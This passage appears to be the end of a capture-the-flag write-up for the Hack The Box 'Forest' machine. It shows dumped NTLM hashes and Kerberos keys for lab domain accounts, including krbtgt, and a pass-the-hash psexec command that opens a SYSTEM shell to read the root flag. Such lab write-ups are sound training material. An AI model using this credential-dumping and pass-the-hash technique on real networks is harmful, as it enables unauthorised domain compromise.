htb.local\mark:1151:aad3b435b51404eeaad3b435b51404ee:9e63ebcb217bf3c6b27056fdcb6150f7:::
htb.local\santi:1152:aad3b435b51404eeaad3b435b51404ee:483d4c70248510d8e0acb6066cd89072:::
bigb0ss:7601:aad3b435b51404eeaad3b435b51404ee:12d1b26faccfadebfc2c5840353001cc:::
pep:7603:aad3b435b51404eeaad3b435b51404ee:328727b81ca05805a68ef26acb252039:::
FOREST$:1000:aad3b435b51404eeaad3b435b51404ee:d4cee94cb410be98048d6890b64d8558:::
EXCH01$:1103:aad3b435b51404eeaad3b435b51404ee:050105bb043f5b8ffc3a9fa99b5ef7c1:::

[*] Kerberos keys grabbed
krbtgt:aes256-cts-hmac-sha1-96:9bf3b92c73e03eb58f698484c38039ab818ed76b4b3a0e1863d27a631f89528b
krbtgt:aes128-cts-hmac-sha1-96:13a5c6b1d30320624570f65b5f755f58
krbtgt:des-cbc-md5:9dd5647a31518ca8
htb.local\HealthMailboxc3d7722:aes256-cts-hmac-sha1-96:258c91eed3f684ee002bcad834950f475b5a3f61b7aa8651c9d79911e16cdbd4
htb.local\HealthMailboxc3d7722:aes128-cts-hmac-sha1-96:47138a74b2f01f1886617cc53185864e
htb.local\HealthMailboxc3d7722:des-cbc-md5:5dea94ef1c15c43e
htb.local\HealthMailboxfc9daad:aes256-cts-hmac-sha1-96:6e4efe11b111e368423cba4aaa053a34a14cbf6a716cb89aab9a966d698618bf
htb.local\HealthMailboxfc9daad:aes128-cts-hmac-sha1-96:9943475a1fc13e33e9b6cb2eb7158bdd
htb.local\HealthMailboxfc9daad:des-cbc-md5:7c8f0b6802e0236e
htb.local\HealthMailboxc0a90c9:aes256-cts-hmac-sha1-96:7ff6b5acb576598fc724a561209c0bf541299bac6044ee214c32345e0435225e
htb.local\HealthMailboxc0a90c9:aes128-cts-hmac-sha1-96:ba4a1a62fc574d76949a8941075c43ed
htb.local\HealthMailboxc0a90c9:des-cbc-md5:0bc8463273fed983
htb.local\HealthMailbox670628e:aes256-cts-hmac-sha1-96:a4c5f690603ff75faae7774a7cc99c0518fb5ad4425eebea19501517db4d7a91
htb.local\HealthMailbox670628e:aes128-cts-hmac-sha1-96:b723447e34a427833c1a321668c9f53f
htb.local\HealthMailbox670628e:des-cbc-md5:9bba8abad9b0d01a
htb.local\HealthMailbox968e74d:aes256-cts-hmac-sha1-96:1ea10e3661b3b4390e57de350043a2fe6a55dbe0902b31d2c194d2ceff76c23c
htb.local\HealthMailbox968e74d:aes128-cts-hmac-sha1-96:ffe29cd2a68333d29b929e32bf18a8c8
htb.local\HealthMailbox968e74d:des-cbc-md5:68d5ae202af71c5d
htb.local\HealthMailbox6ded678:aes256-cts-hmac-sha1-96:d1a475c7c77aa589e156bc3d2d92264a255f904d32ebbd79e0aa68608796ab81
htb.local\HealthMailbox6ded678:aes128-cts-hmac-sha1-96:bbe21bfc470a82c056b23c4807b54cb6
htb.local\HealthMailbox6ded678:des-cbc-md5:cbe9ce9d522c54d5
htb.local\HealthMailbox83d6781:aes256-cts-hmac-sha1-96:d8bcd237595b104a41938cb0cdc77fc729477a69e4318b1bd87d99c38c31b88a
htb.local\HealthMailbox83d6781:aes128-cts-hmac-sha1-96:76dd3c944b08963e84ac29c95fb182b2
htb.local\HealthMailbox83d6781:des-cbc-md5:8f43d073d0e9ec29
htb.local\HealthMailboxfd87238:aes256-cts-hmac-sha1-96:9d05d4ed052c5ac8a4de5b34dc63e1659088eaf8c6b1650214a7445eb22b48e7
htb.local\HealthMailboxfd87238:aes128-cts-hmac-sha1-96:e507932166ad40c035f01193c8279538
htb.local\HealthMailboxfd87238:des-cbc-md5:0bc8abe526753702
htb.local\HealthMailboxb01ac64:aes256-cts-hmac-sha1-96:af4bbcd26c2cdd1c6d0c9357361610b79cdcb1f334573ad63b1e3457ddb7d352
htb.local\HealthMailboxb01ac64:aes128-cts-hmac-sha1-96:8f9484722653f5f6f88b0703ec09074d
htb.local\HealthMailboxb01ac64:des-cbc-md5:97a13b7c7f40f701
htb.local\HealthMailbox7108a4e:aes256-cts-hmac-sha1-96:64aeffda174c5dba9a41d465460e2d90aeb9dd2fa511e96b747e9cf9742c75bd
htb.local\HealthMailbox7108a4e:aes128-cts-hmac-sha1-96:98a0734ba6ef3e6581907151b96e9f36
htb.local\HealthMailbox7108a4e:des-cbc-md5:a7ce0446ce31aefb
htb.local\HealthMailbox0659cc1:aes256-cts-hmac-sha1-96:a5a6e4e0ddbc02485d6c83a4fe4de4738409d6a8f9a5d763d69dcef633cbd40c
htb.local\HealthMailbox0659cc1:aes128-cts-hmac-sha1-96:8e6977e972dfc154f0ea50e2fd52bfa3
htb.local\HealthMailbox0659cc1:des-cbc-md5:e35b497a13628054
htb.local\sebastien:aes256-cts-hmac-sha1-96:fa87efc1dcc0204efb0870cf5af01ddbb00aefed27a1bf80464e77566b543161
htb.local\sebastien:aes128-cts-hmac-sha1-96:18574c6ae9e20c558821179a107c943a
htb.local\sebastien:des-cbc-md5:702a3445e0d65b58
htb.local\lucinda:aes256-cts-hmac-sha1-96:acd2f13c2bf8c8fca7bf036e59c1f1fefb6d087dbb97ff0428ab0972011067d5
htb.local\lucinda:aes128-cts-hmac-sha1-96:fc50c737058b2dcc4311b245ed0b2fad
htb.local\lucinda:des-cbc-md5:a13bb56bd043a2ce
htb.local\svc-alfresco:aes256-cts-hmac-sha1-96:46c50e6cc9376c2c1738d342ed813a7ffc4f42817e2e37d7b5bd426726782f32
htb.local\svc-alfresco:aes128-cts-hmac-sha1-96:e40b14320b9af95742f9799f45f2f2ea
htb.local\svc-alfresco:des-cbc-md5:014ac86d0b98294a
htb.local\andy:aes256-cts-hmac-sha1-96:ca2c2bb033cb703182af74e45a1c7780858bcbff1406a6be2de63b01aa3de94f
htb.local\andy:aes128-cts-hmac-sha1-96:606007308c9987fb10347729ebe18ff6
htb.local\andy:des-cbc-md5:a2ab5eef017fb9da
htb.local\mark:aes256-cts-hmac-sha1-96:9d306f169888c71fa26f692a756b4113bf2f0b6c666a99095aa86f7c607345f6
htb.local\mark:aes128-cts-hmac-sha1-96:a2883fccedb4cf688c4d6f608ddf0b81
htb.local\mark:des-cbc-md5:b5dff1f40b8f3be9
htb.local\santi:aes256-cts-hmac-sha1-96:8a0b0b2a61e9189cd97dd1d9042e80abe274814b5ff2f15878afe46234fb1427
htb.local\santi:aes128-cts-hmac-sha1-96:cbf9c843a3d9b718952898bdcce60c25
htb.local\santi:des-cbc-md5:4075ad528ab9e5fd
bigb0ss:aes256-cts-hmac-sha1-96:7325b427ac42df1b137f4974b1ffedbf5bb2831f1d373ca723abaa33f8d951d6
bigb0ss:aes128-cts-hmac-sha1-96:2c9b56bf23abfa31b950e579ce8f323c
bigb0ss:des-cbc-md5:5831bf0bbf5b85f7
pep:aes256-cts-hmac-sha1-96:75ad952a73b56b1cab38d49404054a20dcece16607f8b8a8f4de7b85807e1544
pep:aes128-cts-hmac-sha1-96:e94b42a879406123efae5836f41ab9ab
pep:des-cbc-md5:f208cb32b902d6bf
FOREST$:aes256-cts-hmac-sha1-96:eb73e0b4da66d7e36f1cd9d80778efc3a90e9924caf04acbc26fc80eb609dc5a
FOREST$:aes128-cts-hmac-sha1-96:c400b0ca4756e80c303aabdd096005f8
FOREST$:des-cbc-md5:0b2f32b62c26f23d
EXCH01$:aes256-cts-hmac-sha1-96:1a87f882a1ab851ce15a5e1f48005de99995f2da482837d49f16806099dd85b6
EXCH01$:aes128-cts-hmac-sha1-96:9ceffb340a70b055304c3cd0583edf4e
EXCH01$:des-cbc-md5:8c45f44c16975129
[*] Cleaning up...

$python3 /usr/share/doc/python3-impacket/examples/psexec.py administrator@10.10.10.161 -hashes aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6

Impacket v0.9.21 - Copyright 2020 SecureAuth Corporation

[*] Requesting shares on 10.10.10.161.....
[*] Found writable share ADMIN$
[*] Uploading file fEteGHHh.exe
[*] Opening SVCManager on 10.10.10.161.....
[*] Creating service UKhA on 10.10.10.161.....
[*] Starting service UKhA.....
[!] Press help for extra shell commands
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.

C:\Windows\system32>whoami

nt authority\system

C:\Windows\system32>cd c:/users
C:\Users>cd Administrator
C:\Users\Administrator>cd Desktop
C:\Users\Administrator\Desktop>type root.txt

f048XXXXXXXXXXXXXXXXXXXXXXXXXXXX




Deja una respuesta

Tu dirección de correo electrónico no será publicada. Los campos obligatorios están marcados con *